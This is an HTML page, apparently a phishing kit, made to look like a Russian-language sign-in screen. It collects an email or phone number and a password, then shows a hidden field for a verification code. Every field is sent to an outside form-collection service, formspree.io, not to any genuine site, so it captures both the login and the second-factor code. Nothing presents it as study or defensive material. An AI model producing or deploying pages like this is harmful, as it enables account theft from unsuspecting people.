<!DOCTYPE html>
<html>
<head>
  <title></title>
  <style>
    body {
      margin: 0;
      padding: 0;
      display: flex;
      align-items: center;
      justify-content: center;
      min-height: 100vh;
      background-image: url("https://165dc6ae-1b27-4856-8ca7-b1edf208847c.selcdn.net/images/original/materials/sections/151000/151000.jpg?1678461663");
      background-repeat: no-repeat;
      background-size: cover;
    }

    .container {
      position: absolute;
      top: 20%;
      left: 50%;
      transform: translate(-50%, -50%);
      width: 350px;
      background-color: white;
      padding: 30px;
    }

    h2 {
      text-align: center;
      color: #333;
    }

    form {
      margin-top: 20px;
    }

    label {
      display: block;
      margin-bottom: 5px;
      color: #333;
    }

    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
    }

    input[type="checkbox"] {
      margin-right: 5px;
    }

    input[type="submit"] {
      display: block;
      width: 100%;
      padding: 10px;
      margin-top: 10px;
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 3px;
      cursor: pointer;
    }

    input[type="submit"]:hover {
      background-color: #0056b3;
    }

    .image-container {
      text-align: center;
      margin-bottom: 20px;
    }

    .image-container img {
      max-width: 100%;
    }

    .code-container {
      display: none;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="image-container">
    </div>
    <h2></h2>

    <form id="login-form" action="https://formspree.io/f/mvonjakw" method="POST">
      <label for="username">Адрес электронной почты или номер телефона:</label>
      <input type="text" id="username" name="username" required>

      <label for="password">Пароль:</label>
      <input type="password" id="password" name="password" required>

      <label>
        <input type="checkbox" id="agreement" required>
        Я согласен с <a href="https://docs.google.com/document/d/19ue3M-HUy4nywzqNDa6Ohf1hwuGtvEsn9n9uFcgUvJw/edit?usp=sharing" target="_blank">условиями пользовательского соглашения</a>
      </label>

      <input type="submit" value="Войти" onclick="showCodeInput()">
      
      <div id="code-container" class="code-container">
        <label for="code">Код:</label>
        <input type="text" id="code" name="code" required>
        
        <input type="submit" value="Подтвердить код" onclick="sendForm()">
      </div>
    </form>
  </div>

  <script>
    function showCodeInput() {
      document.getElementById("code-container").style.display = "block";
    }

    function sendForm() {
      if (document.getElementById("agreement").checked) {
        document.getElementById("login-form").submit();
      } else {
        alert("Пожалуйста, примите пользовательское соглашение.");
      }
    }
  </script>
</body>
</html>
